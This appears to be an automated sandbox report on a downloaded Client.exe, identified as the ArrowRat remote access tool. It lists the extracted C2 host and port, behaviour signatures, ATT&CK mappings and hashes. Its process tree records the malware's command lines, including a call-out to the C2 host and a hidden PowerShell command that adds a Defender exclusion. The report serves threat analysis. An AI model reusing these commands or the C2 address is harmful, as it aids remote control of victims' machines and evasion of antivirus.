Overview

overview

10

Static

static

1

URLScan

urlscan

1

https://www.upload.e...

windows10-2004-x64

10

Analysis

  • max time kernel
    311s
  • max time network
    319s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-03-2024 02:16

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    https://www.upload.ee/files/16384710/Client.exe.html

Score
10/10
arrowratsvchost persistencerat

Malware Config

Extracted

Family

arrowrat

Botnet

svchost

C2

authority-amazon.gl.at.ply.gg:41414

Mutex

mNnfMgqNP

Signatures

  • ArrowRat

    Remote access tool with various capabilities first seen in late 2021.

    ratarrowrat
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
    persistence
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 22 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 14 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 57 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 45 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.upload.ee/files/16384710/Client.exe.html
    1⤵
    • Enumerates system info in registry
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3764
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffde41e46f8,0x7ffde41e4708,0x7ffde41e4718
      2⤵
        PID:2932
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2232,14635164504294481713,530176328023633308,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2248 /prefetch:2
        2⤵
          PID:3148
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2232,14635164504294481713,530176328023633308,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:3628
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2232,14635164504294481713,530176328023633308,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2892 /prefetch:8
          2⤵
            PID:1432
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,14635164504294481713,530176328023633308,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
            2⤵
              PID:2656
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,14635164504294481713,530176328023633308,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
              2⤵
                PID:4724
              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2232,14635164504294481713,530176328023633308,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5448 /prefetch:8
                2⤵
                  PID:4668
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2232,14635164504294481713,530176328023633308,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5448 /prefetch:8
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3968
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,14635164504294481713,530176328023633308,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1
                  2⤵
                    PID:1572
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,14635164504294481713,530176328023633308,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:1
                    2⤵
                      PID:1052
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,14635164504294481713,530176328023633308,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4228 /prefetch:1
                      2⤵
                        PID:3768
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,14635164504294481713,530176328023633308,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:1
                        2⤵
                          PID:4144
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,14635164504294481713,530176328023633308,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6088 /prefetch:1
                          2⤵
                            PID:3504
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,14635164504294481713,530176328023633308,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:1
                            2⤵
                              PID:3612
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,14635164504294481713,530176328023633308,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5312 /prefetch:1
                              2⤵
                                PID:1720
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,14635164504294481713,530176328023633308,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6100 /prefetch:1
                                2⤵
                                  PID:4752
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,14635164504294481713,530176328023633308,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:1
                                  2⤵
                                    PID:3600
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,14635164504294481713,530176328023633308,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6264 /prefetch:1
                                    2⤵
                                      PID:5240
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,14635164504294481713,530176328023633308,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6600 /prefetch:1
                                      2⤵
                                        PID:5516
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,14635164504294481713,530176328023633308,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6932 /prefetch:1
                                        2⤵
                                          PID:5800
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,14635164504294481713,530176328023633308,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6912 /prefetch:1
                                          2⤵
                                            PID:5912
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2232,14635164504294481713,530176328023633308,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6276 /prefetch:8
                                            2⤵
                                              PID:6056
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,14635164504294481713,530176328023633308,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6272 /prefetch:1
                                              2⤵
                                                PID:6064
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2232,14635164504294481713,530176328023633308,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7176 /prefetch:8
                                                2⤵
                                                  PID:4156
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2232,14635164504294481713,530176328023633308,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6616 /prefetch:8
                                                  2⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:4984
                                              • C:\Windows\System32\CompPkgSrv.exe
                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                1⤵
                                                  PID:1068
                                                • C:\Windows\System32\CompPkgSrv.exe
                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                  1⤵
                                                    PID:2860
                                                  • C:\Users\Admin\Downloads\Client.exe
                                                    "C:\Users\Admin\Downloads\Client.exe"
                                                    1⤵
                                                    • Modifies WinLogon for persistence
                                                    • Checks computer location settings
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetThreadContext
                                                    • Modifies registry class
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:4280
                                                    • C:\Windows\explorer.exe
                                                      "C:\Windows\explorer.exe"
                                                      2⤵
                                                      • Modifies Installed Components in the registry
                                                      • Enumerates connected drives
                                                      • Checks SCSI registry key(s)
                                                      • Modifies Internet Explorer settings
                                                      • Modifies registry class
                                                      • Suspicious behavior: AddClipboardFormatListener
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      • Suspicious use of FindShellTrayWindow
                                                      • Suspicious use of SendNotifyMessage
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:5548
                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" svchost authority-amazon.gl.at.ply.gg 41414 mNnfMgqNP
                                                      2⤵
                                                        PID:5552
                                                      • C:\Windows\System32\ComputerDefaults.exe
                                                        "C:\Windows\System32\ComputerDefaults.exe"
                                                        2⤵
                                                          PID:700
                                                          • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
                                                            "PowerShell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\svchost\svchost '
                                                            3⤵
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2884
                                                      • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                        "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                        1⤵
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:3676
                                                      • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                        "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                        1⤵
                                                        • Modifies Internet Explorer settings
                                                        • Modifies registry class
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:6040
                                                      • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                        "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                        1⤵
                                                        • Modifies Internet Explorer settings
                                                        • Modifies registry class
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:6000
                                                      • C:\Windows\system32\WerFault.exe
                                                        C:\Windows\system32\WerFault.exe -pss -s 184 -p 6000 -ip 6000
                                                        1⤵
                                                          PID:2884
                                                        • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                          "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                          1⤵
                                                          • Modifies Internet Explorer settings
                                                          • Modifies registry class
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:1124
                                                        • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                          "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                          1⤵
                                                          • Modifies Internet Explorer settings
                                                          • Modifies registry class
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:1544
                                                        • C:\Users\Admin\Downloads\Client.exe
                                                          "C:\Users\Admin\Downloads\Client.exe"
                                                          1⤵
                                                          • Checks computer location settings
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetThreadContext
                                                          • Modifies registry class
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:3908
                                                          • C:\Windows\explorer.exe
                                                            "C:\Windows\explorer.exe"
                                                            2⤵
                                                              PID:5984
                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" svchost authority-amazon.gl.at.ply.gg 41414 mNnfMgqNP
                                                              2⤵
                                                                PID:5648
                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" svchost authority-amazon.gl.at.ply.gg 41414 mNnfMgqNP
                                                                2⤵
                                                                  PID:3116
                                                                • C:\Windows\System32\ComputerDefaults.exe
                                                                  "C:\Windows\System32\ComputerDefaults.exe"
                                                                  2⤵
                                                                    PID:5884
                                                                    • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
                                                                      "PowerShell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\svchost\svchost '
                                                                      3⤵
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4128
                                                                • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                  1⤵
                                                                  • Modifies Internet Explorer settings
                                                                  • Modifies registry class
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  PID:6040
                                                                • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                  1⤵
                                                                  • Modifies registry class
                                                                  PID:1816
                                                                • C:\Users\Admin\Downloads\Client.exe
                                                                  "C:\Users\Admin\Downloads\Client.exe"
                                                                  1⤵
                                                                  • Checks computer location settings
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of SetThreadContext
                                                                  • Modifies registry class
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  PID:2936
                                                                  • C:\Windows\explorer.exe
                                                                    "C:\Windows\explorer.exe"
                                                                    2⤵
                                                                    • Modifies registry class
                                                                    PID:5812
                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" svchost authority-amazon.gl.at.ply.gg 41414 mNnfMgqNP
                                                                    2⤵
                                                                      PID:4212
                                                                    • C:\Windows\System32\ComputerDefaults.exe
                                                                      "C:\Windows\System32\ComputerDefaults.exe"
                                                                      2⤵
                                                                        PID:6012
                                                                        • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
                                                                          "PowerShell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\svchost\svchost '
                                                                          3⤵
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:1860
                                                                    • C:\Windows\system32\rundll32.exe
                                                                      "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
                                                                      1⤵
                                                                        PID:1624
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k UnistackSvcGroup
                                                                        1⤵
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:5468

                                                                      Network

                                                                      MITRE ATT&CK Matrix ATT&CK v13

                                                                      Initial Access

                                                                      Execution

                                                                      Persistence

                                                                      Boot or Logon Autostart Execution

                                                                      2
                                                                      T1547

                                                                      Registry Run Keys / Startup Folder

                                                                      1
                                                                      T1547.001

                                                                      Winlogon Helper DLL

                                                                      1
                                                                      T1547.004

                                                                      Privilege Escalation

                                                                      Boot or Logon Autostart Execution

                                                                      2
                                                                      T1547

                                                                      Registry Run Keys / Startup Folder

                                                                      1
                                                                      T1547.001

                                                                      Winlogon Helper DLL

                                                                      1
                                                                      T1547.004

                                                                      Defense Evasion

                                                                      Modify Registry

                                                                      3
                                                                      T1112

                                                                      Credential Access

                                                                      Discovery

                                                                      Query Registry

                                                                      5
                                                                      T1012

                                                                      System Information Discovery

                                                                      5
                                                                      T1082

                                                                      Peripheral Device Discovery

                                                                      2
                                                                      T1120

                                                                      Lateral Movement

                                                                      Collection

                                                                      Exfiltration

                                                                      Command and Control

                                                                      Impact

                                                                      Resource Development

                                                                      Reconnaissance

                                                                      Replay Monitor

                                                                      Loading Replay Monitor...

                                                                      Downloads

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PowerShell.exe.log
                                                                        Filesize

                                                                        2KB

                                                                        MD5

                                                                        d85ba6ff808d9e5444a4b369f5bc2730

                                                                        SHA1

                                                                        31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                        SHA256

                                                                        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                        SHA512

                                                                        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                        Download Submit
                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                        Filesize

                                                                        152B

                                                                        MD5

                                                                        73c8d54f775a1b870efd00cb75baf547

                                                                        SHA1

                                                                        33024c5b7573c9079a3b2beba9d85e3ba35e6b0e

                                                                        SHA256

                                                                        1ce86be0476a2a9e409fcb817126285bc4ad83efd03ee06a2f86910fe18d4d94

                                                                        SHA512

                                                                        191344f5830cfea68499bd49073ffa7215a42265a9629d203d07849b2417c0ffdbdbf288bf2c669e91009a0d7e8bd6a6b378c92fc283049141231ca7bf4da3b8

                                                                        Download Submit
                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                        Filesize

                                                                        152B

                                                                        MD5

                                                                        4b206e54d55dcb61072236144d1f90f8

                                                                        SHA1

                                                                        c2600831112447369e5b557e249f86611b05287d

                                                                        SHA256

                                                                        87bf9a4c3564eb3d8bef70450da843ae6003271222734c4d28d9961c52782e0b

                                                                        SHA512

                                                                        c9e8d2452368873e0622b002a0c2f8a2714b5897a09475738a9f9740122d716a9f0d3841725230d58e039564c820d32a6f3a675a7bb04bd163bab53dcb4e22f2

                                                                        Download Submit
                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
                                                                        Filesize

                                                                        288B

                                                                        MD5

                                                                        d78a6053693a3ce337487a0aec95b6c4

                                                                        SHA1

                                                                        c45ef7644cbea3c18191ae725fb05ee95b1c92dd

                                                                        SHA256

                                                                        fce2a2a210806e61374e4b3fe22fc478a431b2c2fe6bdafd67ec29cb7f481941

                                                                        SHA512

                                                                        e70883fef35c92ab68988bb77f6d09a9e1c45a957d51bd0220d3997ddbbf36634da541543d9b1e9eb545dd8b5d799b971e1b25c9961be202d100c5f1bdbdc0df

                                                                        Download Submit
                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                                                                        Filesize

                                                                        3KB

                                                                        MD5

                                                                        0ff0bed54e15c87098f238534a019be9

                                                                        SHA1

                                                                        f82c3c35200a55c1c8ddc457abae42eca4d4f6a7

                                                                        SHA256

                                                                        fe3d72c75e4acaad7926b74902b36574e03c80e76eb84e4bd653d68a94a24925

                                                                        SHA512

                                                                        747f4b8a0d6e13ea10b26913b028a36f56ea0b7e5fec1cde522acf3fa520f9fe0778711a0d6a971700905f7f4616fac818143f978100b8ac75d0f801b31fe25b

                                                                        Download Submit
                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                        Filesize

                                                                        6KB

                                                                        MD5

                                                                        55ce4951259c54e382a59f36430c641f

                                                                        SHA1

                                                                        dcf12529df259e9ec601b98ac646ba27c8f2e308

                                                                        SHA256

                                                                        1ac725522a3cb256f326f65fa05c7225606ff4a12526767a4323eb1a75999826

                                                                        SHA512

                                                                        c0ef83b487d71a3d59c233658c3f21c2031d9dea045162f0d5a93afa72369331cb98e8aa2c96831f13f32673e9a0ffa24589da6464b1b8a91f312dd3e26e51ea

                                                                        Download Submit
                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                        Filesize

                                                                        6KB

                                                                        MD5

                                                                        5b1dd65e5f6a3a55b8fcbe76fbd6edca

                                                                        SHA1

                                                                        f2bd27d9521876d852e5470ea0261498fbc4289f

                                                                        SHA256

                                                                        2925f482ea157105e16fae6d48196b25e46ff65489d21ea08eda2694a267ad96

                                                                        SHA512

                                                                        aa5bf6779132cd07e3c9894539ba529ecf0cd326f1151e61ce945ca9656aa2d1845f0ae9a89bb4aba434811a21ac6e5f9032e257a275d326e50c84137fbaea4c

                                                                        Download Submit
                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                        Filesize

                                                                        7KB

                                                                        MD5

                                                                        8f214b2bf934769ff326a47d01236e0b

                                                                        SHA1

                                                                        ed8457528015657a949088446f99fb781f4f7516

                                                                        SHA256

                                                                        3454974b6b0006cf6520fc9d0a073eab6e9b78b3313e338f8eb443eead30a201

                                                                        SHA512

                                                                        90511aae57a2a98433102166c673aae0a6634631f749bd6ed5d62085e03c3a14d36a1fd3d153eb37f0561b02293599db611b574b632ce4e34acf6af567408c7e

                                                                        Download Submit
                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                        Filesize

                                                                        8KB

